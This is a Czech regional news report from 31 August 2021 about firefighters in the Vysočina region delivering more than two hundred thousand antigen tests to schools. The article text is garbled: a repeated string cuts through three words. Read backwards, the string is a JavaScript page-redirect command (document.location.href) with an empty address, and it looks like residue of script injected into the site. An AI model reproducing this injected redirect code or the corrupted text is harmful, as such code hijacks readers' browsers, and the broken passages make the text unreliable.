Rainbow page separator

Do škol zřizovaných krajem a státem rozvezli testy hasiči

Úterý, 31. srpna 2021

Žďársko, Vysočina / Více než dvě stě tisíc antigenních testů pro školy měli za úkol do konce posledního prázdninového týdne rozvézt vysočinští hasiči. Rozvoz organizoval Kraj Vysočina s tím, že oproti předchozím čtyřem podobným akcím zrealizovaným v období mezi le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošním březnem a červnem musely být distribuční týmy posíleny, aby se veškerý materiál včas dostal na určená místa. Do té doby byly testy uskladněny v pros[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torách Hasičského záchranného sboru Kraje Vysočina v Jihlavě. Právě odtud byly v předchozích měsících rozváženy i další ochranné pomůcky a materiál pro školy včetně respirá[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torů a dezinfekce.
Antigenní testy určené pro obecní, soukromé či církevní školy směřovaly do obcí s rozšířenou působností, kde si je zástupci jednotlivých vzdělávacích zařízení měli vyzvednout. Do krajských a státních škol hasiči krabice s testy rozvezli přímo.